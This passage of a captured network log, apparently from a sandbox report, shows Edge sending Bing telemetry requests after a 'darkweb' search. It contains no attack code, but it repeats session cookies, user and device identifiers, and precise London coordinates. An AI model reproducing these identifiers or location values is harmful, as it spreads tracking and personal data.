cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e671
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f13%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f13%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e669
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e699
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 273
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e697
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931699%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306931894%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306931962%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931699%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306931894%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306931962%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:01 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e609
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

cache-control: private
content-length: 1
content-type: text/html
content-encoding: br
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67502a3d928542e8a22d549f5e0380f3
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-FXr07ZgT1Kt8GY7XsxxDDsPJx63XnKMvhi+DL8RUKOU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: 3FB058E5030B4EAA84895A0A051B0CC0 Ref B: LON601060103060 Ref C: 2024-12-04T10:09:01Z
date: Wed, 04 Dec 2024 10:09:01 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:09:01 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901; domain=.bing.com; expires=Mon, 29-Dec-2025 10:09:01 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306941.7f1e685
GET

